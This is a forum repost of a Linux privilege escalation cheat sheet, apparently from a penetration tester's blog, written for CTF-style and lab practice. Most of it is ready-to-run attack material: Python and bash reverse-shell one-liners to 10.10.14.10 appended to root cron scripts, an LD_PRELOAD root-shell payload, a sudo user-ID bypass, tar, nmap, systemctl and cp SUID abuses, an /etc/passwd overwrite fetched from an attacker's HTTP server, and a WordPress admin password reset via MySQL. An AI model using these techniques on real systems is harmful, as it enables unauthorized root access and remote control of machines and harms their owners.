National Cyber Warfare Foundation (NCWF) Forums


Linux privilege escalation made easy


0 user ratings
2020-08-17 09:06:28
blscott
Red Team (CNA)


Linux Privilege Escalation: Quick and Dirty


A quick and dirty Linux
Privilege Escalation cheat sheet. I have utilized all of these privilege
escalation techniques at least once.Published on Aug 10, 2020

Linux Privilege Escalation: Quick and Dirty
Automated Tooling
Usually, my approach is to use an automated tool in conjunction with
some manual enumeration. However, you can completely accomplish the
Privilege Escalation process from an automated tool paired with the
right exploitation methodology.

1. Linpeas.sh (my go-to, fully automated)

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

2. Linprivchecker.py (my backup)

https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py

3. Linux-Exploit-Suggest-2.pl (To look for those sneaky little Kernel Exploits)

https://github.com/jondonas/linux-exploit-suggester-2

Resources

Keep in mind, that these are just some of the techniques I have used.
You’ll find that some of the existing Linux Privilege escalation guides
are much more comprehensive:

1. The Holy Grail

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

2. My Second Favorite Guide

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalationinux.html_

3. GTFOBins (The most comprehensive binary privesc guide)

https://gtfobins.github.io/



Techniques



God Mode



history


I know, seems crazy, the history command? Why? Well, I’ve successfully performed privilege escalation from finding hints or credentials in the user’s history.



Capabilities

If there’s a capability that has a setuid+ep, the command might be able to be abused

Example:

/usr/bin/python2.6 = capsetuid+ep



For instance, I used this cheat sheet for capability exploits

ref: https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/



Changing WordPress Password via MySQL DB
I came across a situation in which taking over the WordPress website was
essentially in the privilege escalation process due to versioning.



  1. Find MySQL credentials
  2. Connect to the Localhost Database


mysql -h localhost -u user -p


  1. Authenticate using the credentials you found
  2. Select the database that has the credentials table


USE databasename;


  1. Change the admin password or user’s password that you have access to


UPDATE wp_users SET user_pass=PASSWORD('[email protected]!') WHERE user_login='wpadmin';


  1. KEY: wp_users is the table, SET is for the user password field in
    the table, and where is for the user login field within the table.


Permissive Root Script
If a cron job is running a script as root, determine what the script is
doing. If you have full permission to edit the script, you’re golden.
Note: the >> in the one-liner echo represents overwriting the
file.



Two of my favorite examples:



Python One-Liner



echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> test.py


Bash One-Liner (If the script is a .sh)



echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.10 7242 > /tmp/f" >> monitor.sh


Now set up a listener on the defined port, and wait for the script to run.



LD_Preload
In some circumstances, you may be able to abuse certain services that run via LD_Preload.



  1. Run:


sudo -l


  1. If env_keep+=LD+PRELOAD is seen:
  2. Make a C script named “shell” or whatever you want


nano shell.c


  1. Place the following code in the script:



       \#include 

    \#include

    \#include

    void _init() {

    unsetenv("LD_PRELOAD");

    setgid(0);

    setuid(0);

    system("/bin/bash");

    }
  2. Compile the shell



gcc -fPIC -shared -o shell.so shell.c -nostartfiles


  1. Take a look at what system services are being preloaded, for
    instance, if you see apache2 then you would do a sudo preload for
    apache2, escalating your current shell to a root level shell


sudo LD_PRELOAD=/home/user/shell.so apache2


Bash SUID This one absolutely blew my mind, I used
it recently. If you find a private SSH Key, and you can log in with it:
Check for a Bash SUID. If you have it, you might be able to escalate
during authentication!



ssh -i id_rsa [email protected] bash -p


Lua Privilege Escalation This is another one of
those strange one-off scenarios. I had a script that allowed me to drop
into a little command prompt and run different commands as root (but
most of them would just print the word “nil”). I had no idea what was
happening. After a little research, I found out that nil was Lua’s
version of null (basically the error was telling me that it was
attempting to use Lua commands but the commands used did not exist) and
the prompt I was using was some sort of Lua Script. Jokingly, I typed
the following:



os.execute('/bin/sh')


I was root!!



Sudo Bypass



I noticed the following entry [(ALL, !root) /bin/bash)] upon running:



sudo -l 


I had root permissions to run bash, an obvious win! Attempting to run
it as the root user would not work. A quick google search helped me
understand that it was a Sudo Privilege Escalation bypass:



sudo -u#-1 /bin/bash


Tar SUID

If you find a Tar SUID assigned to your current user, it’s an easy win:



sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh


TMUX Session Running as Root

I cannot express how many times this one has been overlooked. I’ve
legitimately exploited 5+ systems in CTF-Like environments with this
gem. If you see a TMUX session running as root, look at the path.
Typically, I’ve seen the session running under /.devs/dev_sess



This can be identified using:



ps -aux | grep tmux


If you see that, and a session is active as the root user, attempt an easy win:



tmux -S /.devs/dev_sess


If it works, check your privs! You might just be root.



NMAP SUID

Yes, another exceedingly simple win:



nmap --interactive
!sh


Systemctl SUID

Identifying this beauty represents yet another win



Run each one of these commands in order:



TF=$(mktemp).service

echo '[Service]

Type=oneshot

ExecStart=/bin/sh -c "id > /tmp/output"

[Install]

WantedBy=multi-user.target' > $TF

systemctl link $TF

systemctl enable --now $TF


Copy SUID



Noticing the ‘cp’ command with SUID assigned to your user account
could allow you to overwrite the passwd file of the victim system,
giving yourself root permissions:



  1. Open up a terminal in your attacking machine, create a salted password:


openssl passwd -1 -salt roflroot pass123


  1. Copy your attacking machine local passwd file to have something to edit:


cp /etc/passwd /root/Exploits


  1. Host HTTP Server:


python -m SimpleHTTPServer 8000


  1. Navigate to /tmp directory on the victim host machine or somewhere you have write permissions and download the passwd file:


wget http://192.168.119.221:8000/passwd


  1. Copy passwd file to /etc/passwd:


cp passwd /etc/passwd


  1. Switch to your created user:


su roflroot


I hope some of these techniques help you!
If you liked my guide, be sure to follow me on Twitter: @johnjhacking







Comments
new comment
Nobody has commented yet. Will you be the first?
 
return to home



Copyright 2012 through 2020 - National Cyber Warfare Foundation - All rights reserved worldwide.